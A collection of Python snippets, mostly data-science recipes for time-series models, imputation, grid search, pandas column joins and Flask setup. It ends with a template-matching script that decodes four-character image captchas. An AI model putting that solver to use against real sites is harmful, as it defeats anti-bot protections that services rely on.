Snippets Collections
# Build a per-episode drawdown table for the fund NAV series in `vdf`.
# NOTE(review): `vdf`, `pd`, `np` come from elsewhere in this snippet file.
dddf = pd.DataFrame(
  index=vdf.index,
  columns=['Drawdown', 'Start', 'End'])

# Drawdown = NAV / running-maximum NAV - 1 (always <= 0; exactly 0 at new highs).
dddf['Drawdown'] = ((vdf['Fund Total'].dropna() / np.maximum.accumulate(vdf['Fund Total'].dropna(), axis=0)) - 1)

# True on dates sitting exactly at a running high (no drawdown).
is_zero = dddf['Drawdown'] == 0

# A drawdown starts where we leave a high: non-zero today, zero yesterday.
dddf['Start'] = ~is_zero & is_zero.shift(1)
start = list(dddf[dddf['Start']].index)

# A drawdown ends where the high is regained: zero today, non-zero yesterday.
dddf['End'] = is_zero & (~is_zero).shift(1)
end = list(dddf[dddf['End']].index)

# First recorded event is an end => the series began mid-drawdown; use day one as its start.
# NOTE(review): raises IndexError if either list is empty — confirm inputs always have both.
if start[0] > end[0]:
	start.insert(0, dddf.index[0])

# Last start has no matching end => the series finishes mid-drawdown.
if start[-1] > end[-1]:
	end.append(dddf.index[-1])

# One row per drawdown episode: dates, duration in days, and depth (the minimum).
dd_vdf = pd.DataFrame(
  index=range(0, len(start)),
  columns=('Start', 'End', 'Length', 'Drawdown'))

for i in range(0, len(start)):
  dd = dddf[start[i]:end[i]]['Drawdown'].min()
  dd_vdf.iloc[i] = (start[i].strftime('%Y-%m-%d'), end[i].strftime('%Y-%m-%d'), (end[i] -start[i]).days, dd)
{
  "python.formatting.provider": "black",
  "python.linting.enabled": false,
  "python.linting.pylintEnabled": true,
  "python.formatting.blackPath": "black",
  "python.pythonPath": ".env/bin/python",
  "editor.formatOnSave": true
}

# Fit an ARIMA(7,1,7) on the log-transformed series and overlay fitted values
# on the differenced series; RMSE via mean_squared_error(..., squared=False).
# NOTE(review): df_log, df_shift, ARIMA and mean_squared_error are defined in
# other cells of this notebook-style snippet file.
plt.figure(figsize=(16,8))
model_ARIMA = ARIMA(df_log, order=(7,1,7)) #Using p=7, d=1, q=7
results_ARIMA = model_ARIMA.fit()
plt.plot(df_shift)
plt.plot(results_ARIMA.fittedvalues, color='red')
plt.title('ARIMA Model - RMSE: %.4f'% mean_squared_error(results_ARIMA.fittedvalues,df_shift['Close'], squared=False))
plt.show()
#Importing AutoReg function to apply AR model
from statsmodels.tsa.ar_model import AutoReg

# Fit a 7-lag autoregression and plot its full in-sample prediction path
# against the differenced series.
plt.figure(figsize=(16,8))
model_AR = AutoReg(df_shift, lags=7) #Using number of lags as 7
results_AR = model_AR.fit()
plt.plot(df_shift)
predict = results_AR.predict(start=0,end=len(df_shift)-1)
predict = predict.fillna(0) #Converting NaN values to 0
plt.plot(predict, color='red')
plt.title('AR Model - RMSE: %.4f'% mean_squared_error(predict,df_shift['Close'], squared=False))  #Calculating rmse
plt.show()
#Importing the seasonal_decompose to decompose the time series
from statsmodels.tsa.seasonal import seasonal_decompose
# Split df_train into trend + seasonal + residual components.
decomp = seasonal_decompose(df_train)

trend = decomp.trend
seasonal = decomp.seasonal
residual = decomp.resid

# Four stacked panels: actual series, then each decomposed component.
plt.figure(figsize=(15,10))
plt.subplot(411)
plt.plot(df_train, label='Actual', marker='.')
plt.legend(loc='upper left')
plt.subplot(412)
plt.plot(trend, label='Trend', marker='.')
plt.legend(loc='upper left')
plt.subplot(413)
plt.plot(seasonal, label='Seasonality', marker='.')
plt.legend(loc='upper left')
plt.subplot(414)
plt.plot(residual, label='Residuals', marker='.')
plt.legend(loc='upper left')
plt.tight_layout()
# Augmented Dickey-Fuller stationarity test on the differenced series.
# NOTE(review): in this snippet's order adfuller(df_shift) runs BEFORE df_shift
# is assigned two lines below — lines were probably pasted out of notebook
# order; confirm the intended sequence.
adfuller(df_shift)
plt.figure(figsize=(16,8))
# First-difference the log series to stabilize the mean.
df_shift = df_log - df_log.shift(periods = 1)
# 12-period rolling statistics to eyeball stationarity.
MAvg_shift = df_shift.rolling(window=12).mean()
MStd_shift = df_shift.rolling(window=12).std()
plt.plot(df_shift, color='c')
plt.plot(MAvg_shift, color='red', label = 'Moving Average')
plt.plot(MStd_shift, color='green', label = 'Standard Deviation')
plt.legend()
plt.show()

#Dropping the null values that we get after applying differencing method
df_shift = df_shift.dropna()
from os import walk

# Top-level file names of `mypath`: walk() yields mypath first, and the
# immediate `break` stops before descending into subdirectories.
f = []
for (dirpath, dirnames, filenames) in walk(mypath):
    f.extend(filenames)
    break
# Equivalent approach: keep only regular files among listdir() entries.
# NOTE(review): the comprehension variable `f` shadows the list `f` above —
# confusing but harmless in Python 3 (comprehension scope is separate).
from os import listdir
from os.path import isfile, join
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
%sql SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%';
https://vimsky.com/zh-tw/examples/detail/python-method-regex.sub.html
# Collect every .txt corpus file for LDA preprocessing.
all_filenames = glob.glob("/home/lynaza/Desktop/Quinn/lda/檢察官起訴書/*.txt")

# Return only the file names (the directory may also contain files with other
# extensions).  FIX: the original lines carried a stray leading space, which is
# invalid top-level indentation in Python.
import os
arr = os.listdir("/home/lynaza/Desktop/Quinn/lda/檢察官起訴書")
print(arr)



import cv2
import os
import glob

def load_images_name(path, ext='.tif', max_depth=4):
    """Collect image file paths under *path*, searching 1 to *max_depth*
    folder levels deep.

    Generalized from four copy-pasted glob calls: *ext* selects the file
    extension (default '.tif') and *max_depth* the nesting depth, while the
    default call load_images_name(path) behaves exactly like the original.

    Returns a list of matching paths, shallowest level first.
    """
    images_path = []
    pattern = path
    for _ in range(max_depth):
        pattern += '/*'                       # descend one folder level
        images_path.extend(glob.glob(pattern + ext))
    return images_path

images = load_images_name("/home/lynaza/Desktop/traindata/test")
class Solution:
    def maxTip(self, a, b, n, x, y):
        """Maximize the total tip for n orders, where order i pays a[i] if
        waiter A serves it and b[i] if waiter B does; A may take at most x
        orders and B at most y.

        Greedy: settle the orders with the largest |a[i] - b[i]| first, since
        choosing the wrong waiter on those costs the most.

        FIX: the original's a[i] == b[i] branch added the tip without
        consuming either waiter's capacity, silently overbooking when ties
        occur; totals are unchanged, but capacities are now tracked correctly.
        """
        # Same processing order as the original: stable ascending sort by
        # gap, then reversed (largest gap first).
        total = 0
        taken_a = taken_b = 0
        for i in sorted(range(n), key=lambda idx: abs(a[idx] - b[idx]))[::-1]:
            if a[i] > b[i]:
                # Prefer A's larger tip while A has capacity, else fall back to B.
                if taken_a < x:
                    total += a[i]
                    taken_a += 1
                else:
                    total += b[i]
                    taken_b += 1
            elif a[i] < b[i]:
                # Symmetric: prefer B while B has capacity.
                if taken_b < y:
                    total += b[i]
                    taken_b += 1
                else:
                    total += a[i]
                    taken_a += 1
            else:
                # Tip is identical either way; still consume capacity.
                total += a[i]
                if taken_a < x:
                    taken_a += 1
                else:
                    taken_b += 1
        return total
            
       

if __name__ == '__main__':
    # Read the number of test cases, then for each: n, x, y on one line,
    # followed by the two tip arrays.
    solver = Solution()
    for _ in range(int(input())):
        n, x, y = map(int, input().strip().split())
        a = list(map(int, input().strip().split()))
        b = list(map(int, input().strip().split()))
        print(solver.maxTip(a, b, n, x, y))
class Solution:
    def maxTip(self, a, b, n, x, y):
        """Greedy max-tip: give each order to the waiter with the larger tip,
        deciding largest-difference orders first; x and y cap how many orders
        waiters A and B may take respectively."""
        gaps = [abs(a[i] - b[i]) for i in range(n)]
        ranked = sorted(enumerate(gaps), key=lambda pair: pair[1])
        total = 0
        used_a, used_b = 0, 0
        # Walk from largest gap to smallest.
        for idx, _gap in ranked[::-1]:
            ai, bi = a[idx], b[idx]
            if ai > bi and used_a < x:
                total += ai
                used_a += 1
            elif ai < bi and used_b < y:
                total += bi
                used_b += 1
            elif ai > bi and used_a == x:
                # A is full — B has to take it.
                total += bi
                used_b += 1
            elif ai < bi and used_b == y:
                # B is full — A has to take it.
                total += ai
                used_a += 1
            elif ai == bi:
                total += ai
        return total
            
       

if __name__ == '__main__':
    # One test-case count, then per case: header line (n x y) and two arrays.
    cases = int(input())
    for _ in range(cases):
        n, x, y = map(int, input().strip().split())
        a = [int(v) for v in input().strip().split()]
        b = [int(v) for v in input().strip().split()]
        print(Solution().maxTip(a, b, n, x, y))
class Solution:
    def maxTip(self, a, b, n, x, y):
        """Maximize total tips with per-waiter order caps x (waiter A) and
        y (waiter B), assigning the most contested orders first."""
        diffs = []
        for i in range(n):
            diffs.append(abs(a[i] - b[i]))
        ranked = sorted(list(enumerate(diffs)), key=lambda pair: pair[1])
        total = 0
        count_a, count_b = 0, 0
        for pair in reversed(ranked):
            i = pair[0]
            if a[i] == b[i]:
                # Equal tips: the choice of waiter doesn't change the total.
                total += a[i]
            elif a[i] > b[i]:
                if count_a < x:
                    total += a[i]
                    count_a += 1
                else:
                    # A is at capacity; B serves it.
                    total += b[i]
                    count_b += 1
            else:
                if count_b < y:
                    total += b[i]
                    count_b += 1
                else:
                    # B is at capacity; A serves it.
                    total += a[i]
                    count_a += 1
        return total
            
       

if __name__ == '__main__':
    # Countdown over the declared number of test cases.
    remaining = int(input())
    while remaining:
        n, x, y = [int(v) for v in input().strip().split()]
        a = list(map(int, input().strip().split()))
        b = list(map(int, input().strip().split()))
        result = Solution().maxTip(a, b, n, x, y)
        print(result)
        remaining -= 1
# Create an isolated conda environment pinned to Python 3.7
conda create -n p37env python=3.7
# Switch into it
conda activate p37env
# Install the TensorFlow Model Garden official models
pip install tf-models-official
import pandas as pd

# Minimal example: build a two-column DataFrame and export it to CSV.
data = {'Product': ['Desktop Computer','Tablet','Printer','Laptop'],
        'Price': [850,200,150,1300]
        }

df = pd.DataFrame(data, columns= ['Product', 'Price'])

# NOTE(review): placeholder path — replace with a real destination before running.
df.to_csv(r'Path where you want to store the exported CSV file\File Name.csv')

print (df)
# best way
# Concatenate many text columns into one space-separated string column.
data['resume'] = data[['Resume_title', 'City', 'State', 'Description', 'work_experiences', 'Educations', 'Skills', 'Certificates', 'Additional Information']].agg(' '.join, axis=1)


# other way
# Alternative recipes for combining two (string) columns:
df["period"] = df["Year"] + df["quarter"]
df['Period'] = df['Year'] + ' ' + df['Quarter']
df["period"] = df["Year"].astype(str) + df["quarter"] #If one (or both) of the columns are not string typed
#Beware of NaNs when doing this!
# NOTE(review): the literal `...` below is placeholder pseudo-code — replace
# with real column names before running.
df['period'] = df[['Year', 'quarter', ...]].agg('-'.join, axis=1) #for multiple string columns
df['period'] = df[['Year', 'quarter']].apply(lambda x: ''.join(x), axis=1)
#method cat() of the .str accessor 
df['Period'] = df.Year.str.cat(df.Quarter)
df['Period'] = df.Year.astype(str).str.cat(df.Quarter.astype(str), sep='q')
df['AllTogether'] = df['Country'].str.cat(df[['State', 'City']], sep=' - ') #add parameter na_rep to replace the NaN values with a string if have nan
columns = ['whatever', 'columns', 'you', 'choose']
df['period'] = df[columns].astype(str).sum(axis=1)

#a function
def str_join(df, sep, *cols):
    """Join the given DataFrame columns into one string Series, separated by
    *sep*; every column is cast to str first.

    FIX: the original was pasted from an IPython session and still carried
    the `...:` / `In [4]:` prompt artifacts, which are not valid Python.
    """
    from functools import reduce
    return reduce(
        lambda left, right: left.astype(str).str.cat(right.astype(str), sep=sep),
        [df[col] for col in cols],
    )

# Example usage:
# df['cat'] = str_join(df, '-', 'c0', 'c1', 'c2', 'c3')
import re

text = 'this is a text'

# Extract whatever sits between the first 'is' and 'text' (non-greedy).
try:
    found = re.search('is(.+?)text', text).group(1)
except AttributeError:
    # pattern not found in the original string (search() returned None)
    found = '0 wtitle' # apply your error handling
found

# FIX: the original ended with a stray REPL output line `=> a`, which is a
# syntax error in a script.  Note the first 'is' matched is the one inside
# 'this', so group(1) is ' is a '.

# To get more than 1 search
# Extract every job title between the 'wtitle' and 'wcompany' markers of each
# resume row, collecting one list per row.
# NOTE(review): range(0,9282) hard-codes a specific dataset's row count —
# prefer range(len(data)).  The bare except most plausibly guards NaN rows
# (re.findall raises TypeError on non-strings), but it then stores the string
# 'onejob' instead of a list — confirm downstream code handles both shapes.
job_title = []
for i in range(0,9282):
    text = data.work_experiences.iloc[i]
    try:
        title = re.findall(r"wtitle (.*?) wcompany",text)
    except :
        title = 'onejob'
    job_title.append(title)
    
data['job_title'] = job_title
# picking up piece of string between separators
# function using partition, like partition, but drops the separators
def between(left, right, s):
    """Split *s* around the first *left*...*right* pair.

    Returns (text before left, text between left and right, text after right);
    the separators themselves are dropped.
    """
    before, _, a = s.partition(left)
    a, _, after = a.partition(right)
    return before, a, after

s = "bla bla blaa <a>data</a> lsdjfasdjöf (important notice) 'Daniweb forum' tcha tcha tchaa"
# FIX: the original used Python-2 print statements (SyntaxError on Python 3).
print(between('<a>','</a>',s))
print(between('(',')',s))
print(between("'","'",s))

""" Output:
('bla bla blaa ', 'data', " lsdjfasdjöf (important notice) 'Daniweb forum' tcha tcha tchaa")
('bla bla blaa <a>data</a> lsdjfasdjöf ', 'important notice', " 'Daniweb forum' tcha tcha tchaa")
('bla bla blaa <a>data</a> lsdjfasdjöf (important notice) ', 'Daniweb forum', ' tcha tcha tchaa')
"""
# Imputation "extension": impute missing values AND add indicator columns
# recording which cells were originally missing.
# NOTE(review): cols_with_missing, X_train/X_valid, y_train/y_valid,
# SimpleImputer and score_dataset are defined elsewhere in this file.
# Make copy to avoid changing original data (when imputing)
X_train_plus = X_train.copy()
X_valid_plus = X_valid.copy()

# Make new columns indicating what will be imputed
for col in cols_with_missing:
    X_train_plus[col + '_was_missing'] = X_train_plus[col].isnull()
    X_valid_plus[col + '_was_missing'] = X_valid_plus[col].isnull()

# Imputation
my_imputer = SimpleImputer()
imputed_X_train_plus = pd.DataFrame(my_imputer.fit_transform(X_train_plus))
imputed_X_valid_plus = pd.DataFrame(my_imputer.transform(X_valid_plus))

# Imputation removed column names; put them back
imputed_X_train_plus.columns = X_train_plus.columns
imputed_X_valid_plus.columns = X_valid_plus.columns

print("MAE from Approach 3 (An Extension to Imputation):")
print(score_dataset(imputed_X_train_plus, imputed_X_valid_plus, y_train, y_valid))
from sklearn.impute import SimpleImputer

# Basic mean-imputation of missing values (SimpleImputer default strategy),
# fitted on the training split and applied to validation.
# Imputation
my_imputer = SimpleImputer()
imputed_X_train = pd.DataFrame(my_imputer.fit_transform(X_train))
imputed_X_valid = pd.DataFrame(my_imputer.transform(X_valid))

# Imputation removed column names; put them back
imputed_X_train.columns = X_train.columns
imputed_X_valid.columns = X_valid.columns

print("MAE from Approach 2 (Imputation):")
print(score_dataset(imputed_X_train, imputed_X_valid, y_train, y_valid))
from sklearn.metrics import mean_absolute_error
from sklearn.tree import DecisionTreeRegressor

def get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y):
    """Fit a DecisionTreeRegressor capped at *max_leaf_nodes* (random_state=0)
    and return its mean absolute error on the validation split."""
    tree = DecisionTreeRegressor(max_leaf_nodes=max_leaf_nodes, random_state=0)
    tree.fit(train_X, train_y)
    predictions = tree.predict(val_X)
    return mean_absolute_error(val_y, predictions)


# Sweep candidate tree sizes to pick the max_leaf_nodes with the lowest
# validation MAE (train_X/val_X/train_y/val_y come from the split above).
for max_leaf_nodes in [5, 50, 500, 5000]:
    my_mae = get_mae(max_leaf_nodes, train_X, val_X, train_y, val_y)
    print("Max leaf nodes: %d  \t\t Mean Absolute Error:  %d" %(max_leaf_nodes, my_mae))
import pandas as pd
import matplotlib.pyplot as plt
  
# Two parallel lists -> two Series -> a DataFrame with named columns.
author = ['Jitender', 'Purnima', 'Arpit', 'Jyoti']
article = [210, 211, 114, 178]

auth_series = pd.Series(author)
article_series = pd.Series(article)

# Mapping of column name -> column data.
frame = {'Author': auth_series, 'Article': article_series}

result = pd.DataFrame(frame)

print(result)
# End-to-end decision-tree baseline on the Iowa housing data.
# NOTE(review): home_data is loaded elsewhere in this snippet file.
#define the target
y = home_data.SalePrice

#Create the list of features below
feature_names = ['LotArea','YearBuilt','1stFlrSF','2ndFlrSF','FullBath','BedroomAbvGr','TotRmsAbvGrd']

# Select data corresponding to features in feature_names
X = home_data[feature_names]

from sklearn.model_selection import train_test_split

# split data into training and validation data, for both features and target
# The split is based on a random number generator. Supplying a numeric value to
# the random_state argument guarantees we get the same split every time we
# run this script.
train_X, val_X, train_y, val_y = train_test_split(X, y, random_state = 1)

from sklearn.tree import DecisionTreeRegressor
#specify the model
#For model reproducibility, set a numeric value for random_state when specifying the model
iowa_model = DecisionTreeRegressor(random_state=1)

# Fit the model
iowa_model.fit(train_X, train_y)

# get predicted prices on validation data
val_predictions = iowa_model.predict(val_X)

from sklearn.metrics import mean_absolute_error

# Report the validation mean absolute error.
print(mean_absolute_error(val_y, val_predictions))

# Column-wise (axis=0) and row-wise (axis=1) sums.
# NOTE(review): skipna expects a bool (default True); passing None is dubious
# and recent pandas versions may reject it — confirm intent.
df.sum(axis=0, skipna=None)

df.sum(axis=1, skipna=None)
# FIX: `date` and `datetime` were used without being imported anywhere in
# this snippet.
from datetime import date, datetime

# Build today's date at a fixed wall-clock time (10:30 AM) and compare it
# with the current moment.
today = str(date.today())
now = datetime.now()
print(now)
my_datetime = datetime.strptime(today + ' 10:30AM', '%Y-%m-%d %I:%M%p')
print(my_datetime)
if now > my_datetime:
    # Only reached after 10:30 AM local time.
    print("Hello")
# Count (id, group, term) occurrences and pivot the terms into columns.
df.groupby(['id', 'group', 'term']).size().unstack(fill_value=0)
# Append empty columns to an existing frame.
mydf = mydf.reindex(columns = mydf.columns.tolist() + ['newcol1','newcol2'])
# Binary flag list: 1 where Mid-Point <= 30, else 0.
[1 if x<=30 else 0 for x in df_w['Mid-Point']]
import requests

api = 'http://site.api.espn.com/apis/site/v2/sports/baseball/mlb/scoreboard'

# Pull today's MLB scoreboard and keep the Gamecast page URL of every event.
jsonData = requests.get(api).json()
events = jsonData['events']

links = [
    link['href']
    for event in events
    for link in event['links']
    if link['text'] == 'Gamecast'
]
# Label each row 'red' where Set == 'Z', otherwise 'green'.
df['color'] = ['red' if x == 'Z' else 'green' for x in df['Set']]

# Run Flask in development mode (debugger + auto-reload):
export FLASK_ENV=development                         

# ...or in production mode:
export FLASK_ENV=production 

# Point Flask at the app module and start the dev server.
FLASK_APP=hello.py flask run






If you have installed many dependencies in your system and you need a requirements.txt for a specific project, you can first install pipreqs:

$ pip install pipreqs

and execute the below command under the project folder.

$ pipreqs

This command will generate requirements.txt file for the particular project.
from flask import Flask
app = Flask(__name__)

# Minimal Flask app: a single route on "/" returning a plain-text greeting.
@app.route("/")
def hello():
    return "Hello World!"
text = "This is \n some text"
y0, dy = 50, 4
for i, line in enumerate(text.split('\n')):
    y = y0 + i*dy
    cv2.putText(img, line, (50, y ), cv2.FONT_HERSHEY_SIMPLEX, 1, 2)
# Event-loop fragment (FIX: the original had inconsistent indentation that
# is a SyntaxError outside its source context).  Assumes `event` comes from
# pygame.event.get() and `keys` is a 4-element WASD state list.
# check if the event is the X button
if event.type == pygame.QUIT:
    # if it is, quit the game
    pygame.quit()
    exit(0)

# Releasing a WASD key clears the corresponding held-key flag.
if event.type == pygame.KEYUP:
    if event.key == pygame.K_w:
        keys[0] = False
    elif event.key == pygame.K_a:
        keys[1] = False
    elif event.key == pygame.K_s:
        keys[2] = False
    elif event.key == pygame.K_d:
        keys[3] = False
grouped_df = df.groupby("segment")

max_cust = grouped_df.customers.max()
grouped_df = df.groupby("segment")
max_cust = df.groupby("segment").customers.transform(max)
class MLP(torch.nn.Module):
    """Two-layer perceptron: Linear(D_in -> H) -> Sigmoid -> Linear(H -> D_out)."""

    def __init__(self, D_in, H, D_out):
        """Instantiate the two nn.Linear modules and the sigmoid activation
        and assign them as member variables.

        FIX: the original called super(MLPModel, self).__init__() — MLPModel
        is undefined (the class is named MLP), a guaranteed NameError — and
        its docstrings were indented inconsistently with the method bodies,
        which is an IndentationError.
        """
        super(MLP, self).__init__()
        self.hidden1 = torch.nn.Linear(D_in, H)
        self.hidden2 = torch.nn.Linear(H, D_out)
        self.sig = torch.nn.Sigmoid()

    def forward(self, x):
        """Accept a Tensor of input data and return a Tensor of output data:
        sigmoid of the first layer, then the second (no output activation)."""
        out = self.sig(self.hidden1(x))
        out = self.hidden2(out)
        return out
# NOTE(review): DataFrame.drop returns a NEW frame; without assignment (or
# inplace=True) this line has no lasting effect — confirm intent.
df.drop(['results', 'cum_sum_pred', 'cus_sum_pred'], axis=1)
# python
# (FIX: the original marked this section with `// python`, which is a
# SyntaxError in a Python file.)
def isbright(image, dim=10, thresh=0.5):
    """Return True when *image* (BGR) is "bright": the mean of the normalized
    L (lightness) channel exceeds *thresh*."""
    # Resize image to dim x dim so the estimate is cheap and size-independent
    image = cv2.resize(image, (dim, dim))
    # Convert color space to LAB format and extract L channel
    L, A, B = cv2.split(cv2.cvtColor(image, cv2.COLOR_BGR2LAB))
    # Normalize L channel by dividing all pixel values with maximum pixel value
    # NOTE(review): an all-black image makes np.max(L) zero -> division warning
    # and NaN mean (NaN > thresh is False, so the result is still "dark").
    L = L/np.max(L)
    # Return True if mean is greater than thresh else False
    return np.mean(L) > thresh

// c++
// Port of the Python isbright() above: estimate brightness from the mean of
// the normalized L (lightness) channel.
bool rockface_image_is_bright(cv::Mat img_mat, int dim, float threshold)
{
	// Resize image to 10x10
	cv::resize(img_mat, img_mat, { dim, dim });

	// Convert color space to LAB format and extract L channel
	// NOTE(review): uses COLOR_RGB2Lab while the Python version uses BGR2LAB —
	// confirm the caller's channel order.
	cv::cvtColor(img_mat, img_mat, cv::COLOR_RGB2Lab);
	cv::Mat labchannel[3];
	cv::split(img_mat, labchannel);

	// NOTE(review): leftover debug display — waitKey(0) blocks until a key is
	// pressed; remove for non-interactive use.
	cv::imshow("L", labchannel[0]);
	cv::waitKey(0);

	// Normalize L channel by dividing all pixel values with maximum pixel value
	// NOTE(review): NORM_MINMAX maps min->0 and max->1, which differs from the
	// Python version's L / max(L) whenever min(L) > 0 — results can diverge.
	cv::Mat L;
	cv::normalize(labchannel[0], L, 0, 1, cv::NORM_MINMAX);

	// Return True if mean is greater than thresh else False
	float brightness = cv::mean(L).val[0];
	std::cout << "brightness: " << brightness << std::endl;
	return brightness > threshold;
}
# AdaBoost (over a decision tree) tuned by grid search, then combined with
# other tuned models in a soft-voting ensemble.
# NOTE(review): kfold, X_train/Y_train, BernoulliNB_best and
# DummyClassifier_best are defined elsewhere in this snippet file.
DTC = DecisionTreeClassifier()
ADB = AdaBoostClassifier(DTC)

# FIX: the original `{ # Params here }` left the brace unclosed (the comment
# swallowed the closing brace) — a SyntaxError.
ada_param_grid = {}  # put the AdaBoost hyper-parameter grid here

gsABC = GridSearchCV(ADB,param_grid = ada_param_grid , cv=kfold, scoring="accuracy", n_jobs= 4, verbose = 1)

# FIX: the search must be fitted before best_estimator_ exists.
gsABC.fit(X_train, Y_train)
AdaBoost_best =gsABC.best_estimator_

 # Likewise you can do for others and then perform Voting

votingC = VotingClassifier(estimators=[('ada', AdaBoost_best), ('nb', BernoulliNB_best),
    ('dc', DummyClassifier_best)], voting='soft', n_jobs=4)

votingC = votingC.fit(X_train, Y_train)
from sklearn.model_selection import GridSearchCV
# Two grids: linear kernel over C, and RBF kernel over C x gamma.
parameters = [{'C': [1, 10, 100, 1000], 'kernel': ['linear']},
              {'C': [1, 10, 100, 1000], 'kernel': ['rbf'], 'gamma': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]}]
# 10-fold CV over every combination, using all cores (n_jobs=-1).
grid_search = GridSearchCV(estimator = classifier,
                           param_grid = parameters,
                           scoring = 'accuracy',
                           cv = 10,
                           n_jobs = -1)
grid_search = grid_search.fit(X_train, y_train)
best_accuracy = grid_search.best_score_
best_parameters = grid_search.best_params_
def print_accuracy_and_parameters(grid_search):
    """Print a fitted GridSearchCV's best score, parameters and estimator,
    then return the top five parameter sets ranked by mean test score."""
    print(grid_search.best_score_)
    print(grid_search.best_params_)
    print(grid_search.best_estimator_)

    cv_results = pd.DataFrame(grid_search.cv_results_)

    ranked = cv_results[['params', 'mean_test_score']].sort_values(
        'mean_test_score', ascending=False)
    return ranked.head()
# Compare three regressors with 5-fold cross-validation.
reg_rf = RandomForestRegressor(n_estimators=50)
reg_SVR = SVR(kernel='rbf')
reg_lm = LinearRegression()

models = {'RandomForest':reg_rf,'SVM':reg_SVR, 'LinearRegression':reg_lm}


# NOTE(review): cross-validating on X_test/y_com_test — model selection is
# normally done on training data; confirm this is intended.
results = []
for name, model in models.items():
    cv_results = cross_val_score(model, X_test, y_com_test, cv=5)
    print(cv_results.mean())
    print(cv_results.std())

    results.append(cv_results.mean())
# 10-fold CV accuracy summary for a single classifier.
cv_accuracies = cross_val_score(classifier, X_train, y_train, cv=10)
print('CV mean acc: ', cv_accuracies.mean())
print('CV mean std: ', cv_accuracies.std())

# can also do cv this way
cv_score = cross_val_score(alg, X_train, y_train, cv=cv_folds)

# One-line summary: mean / std / min / max of the fold scores.
print ("CV Score : Mean - %.7g | Std - %.7g | Min - %.7g | Max - %.7g" % (np.mean(cv_score),
                                                                          np.std(cv_score),
                                                                          np.min(cv_score),
                                                                          np.max(cv_score)))
>>> 'Coordinates: {latitude}, {longitude}'.format(latitude='37.24N', longitude='-115.81W')
'Coordinates: 37.24N, -115.81W'
>>> coord = {'latitude': '37.24N', 'longitude': '-115.81W'}
>>> 'Coordinates: {latitude}, {longitude}'.format(**coord)
'Coordinates: 37.24N, -115.81W'
import shutil
import operator
import os
from PIL import Image, ImageChops
from operator import itemgetter

def process(file_name):
	"""Binarize a captcha image and save the result to tmp.png.

	Builds a pixel-value histogram, takes the two LOWEST pixel values as
	background and captcha ink (NOTE(review): sorted_d orders by pixel VALUE,
	not frequency — confirm that is intended), keeps only ink pixels, then
	forces pixels differing from all four diagonal neighbours to ink.

	FIX: the original used Python-2 print statements (SyntaxError on Py3).
	"""
	im = Image.open(file_name, "r")
	# Get the size of the picture
	width, height = im.size

	# Pixel access object (palette indices, not RGB triples)
	pixels = im.load()

	# Histogram: pixel value -> occurrence count
	d = {}

	for x in range(width):
		for y in range(height):
			if pixels[x, y] not in d:
				d[pixels[x, y]] = 1
			else:
				d[pixels[x, y]] += 1
	print(d)
	sorted_d = sorted(d.items(), key=operator.itemgetter(0))
	background = sorted_d[0][0]
	captcha = sorted_d[1][0]
	print(background, captcha)

	# Keep only captcha ink: ink -> palette index 1, everything else -> 0
	for x in range(width):
		for y in range(height):
			if pixels[x, y] != captcha:
				pixels[x, y] = 0
			else:
				pixels[x, y] = 1
	im.putpalette([0, 0, 0, 255, 255, 255])
	# pattern fix: a pixel unlike all four diagonal neighbours is treated as
	# noise and forced to ink (1)
	for x in range(1, width - 1, 1):
		for y in range(1, height - 1, 1):
			if (pixels[x, y] != pixels[x - 1, y - 1]) and (pixels[x, y] != pixels[x + 1, y - 1]) and (pixels[x, y] != pixels[x - 1, y + 1]) and (pixels[x, y] != pixels[x + 1, y + 1]):
				pixels[x, y] = 1

	im.save("tmp.png")

def main(file_name):
	"""Decode a 4-character captcha: binarize it via process(), slice it into
	letters by scanning for ink columns, then template-match each slice
	against the images under samples/.

	FIX: the original used Python-2 print statements (SyntaxError on Py3).
	"""
	print("[?] Input file:", file_name)
	process(file_name)
	captcha_filtered = Image.open('tmp.png')
	captcha_filtered = captcha_filtered.convert("P")
	inletter = False
	foundletter = False
	start = 0
	end = 0

	letters = []

	# Scan columns left-to-right: the first column containing ink starts a
	# letter span, the first empty column after it ends the span.
	for y in range(captcha_filtered.size[0]): # slice across
		for x in range(captcha_filtered.size[1]): # slice down
			pix = captcha_filtered.getpixel((y,x))
			if pix != 0:
				inletter = True

		if foundletter == False and inletter == True:
			foundletter = True
			start = y

		if foundletter == True and inletter == False:
			foundletter = False
			end = y
			letters.append((start,end))

		inletter = False

	print("[+] Horizontal positions:", letters)

	captcha = ""

	if len(letters) == 4:
		# Template file names follow "<d|l|u>-<char>.png": digit / lowercase / uppercase.
		file_names = ["d-0.png", "d-3.png", "d-6.png", "d-9.png", "l-c.png", "l-f.png", "l-i.png", "l-m.png", "l-p.png", "l-s.png", "l-v.png", "l-y.png", "u-b.png", "u-E.png", "u-H.png", "u-k.png", "u-N.png", "u-q.png", "u-t.png", "u-w.png", "u-z.png", "d-1.png", "d-4.png", "d-7.png", "l-a.png", "l-d.png", "l-g.png", "l-j.png", "l-n.png", "l-q.png", "l-t.png", "l-w.png", "l-z.png", "u-c.png", "u-f.png", "u-i.png", "u-l.png", "u-o.png", "u-r.png", "u-u.png", "u-x.png", "d-2.png", "d-5.png", "d-8.png", "l-b.png", "l-e.png", "l-h.png", "l-k.png", "l-o.png", "l-r.png", "l-u.png", "l-x.png", "u-A.png", "u-d.png", "u-G.png", "u-J.png", "u-m.png", "u-p.png", "u-s.png", "u-V.png", "u-y.png"]
		for letter in letters:
			im3 = captcha_filtered.crop(( letter[0], 0, letter[1],captcha_filtered.size[1] ))
			im3 = im3.crop((0, 92, im3.size[0], 220))
			base = im3.convert('L')

			# Best template match so far (smaller difference = better).
			class Fit:
				letter = None
				difference = 0

			best = Fit()

			for letter in file_names:
				current = Fit()
				current.letter = letter

				sample_path = "samples/" + letter
				sample = Image.open(sample_path).convert('L').resize(base.size)
				difference = ImageChops.difference(base, sample)

				# Sum of absolute per-pixel differences.
				for x in range(difference.size[0]):
					for y in range(difference.size[1]):
						current.difference += difference.getpixel((x, y))

				if not best.letter or best.difference > current.difference:
					best = current

			#final captcha decoded
			tmp = ''
			tp, letter = best.letter.split('-')
			letter = letter.split('.')[0]
			if tp == 'u':
				tmp = letter.upper()
			else:
				tmp = letter
			print("[+] New leter:", tmp)
			captcha = captcha + tmp
		print("[+] Correct captcha:", captcha)
	else:
		print("[!] Missing characters in captcha !")

if __name__ == '__main__':
